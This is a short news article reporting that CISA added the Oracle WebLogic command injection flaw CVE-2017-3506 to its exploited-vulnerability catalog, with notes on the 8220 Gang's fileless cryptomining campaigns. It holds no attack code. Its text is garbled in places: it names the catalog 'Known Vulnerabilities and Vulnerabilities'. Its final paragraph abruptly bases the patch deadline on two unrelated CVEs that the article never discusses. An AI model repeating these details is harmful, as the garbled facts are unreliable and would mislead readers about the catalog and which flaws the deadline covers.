The US Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added security flaws affecting Oracle WebLogic Server to its Known Vulnerabilities and Vulnerabilities (KEV) catalog, citing evidence that they are currently being exploited in the wild.
The issue, tracked as CVE-2017-3506 (CVSS score: 7.4), involves a command injection vulnerability in the operating system (OS) that could be exploited to allow unauthorized access and complete control over an affected server.
“Oracle WebLogic Server, a product within the Fusion Middleware suite, contains an OS command injection vulnerability that could allow an attacker to execute arbitrary code via a specially crafted HTTP request containing a malicious XML document,” CISA said.
Authorities have not disclosed the nature of the attacks that exploited the vulnerability, but a China-based cryptojacking group known as 8220 Gang, also known as Water Sigbin, has been using it since early last year to integrate unpatched devices into cryptocurrency-mining botnets.
According to a recent report by Trend Micro, the 8220 Gang has been observed exploiting Oracle WebLogic server vulnerabilities (CVE-2017-3506 and CVE-2023-21839) to launch cryptocurrency miners filelessly in memory using shell or PowerShell scripts depending on the target operating system.
“The criminal group employed obfuscation techniques such as hex encoding of URLs and use of HTTP over port 443 to enable covert delivery of their payloads,” said security researcher Sunil Bharti. “The PowerShell scripts and the resulting batch files used complex encoding and used environment variables to hide malicious code within seemingly benign script components.”
Given that CVE-2024-1086 and CVE-2024-24919 are being actively exploited in the wild, federal agencies are encouraged to apply the latest patches by June 24, 2024 to protect their networks from potential threats.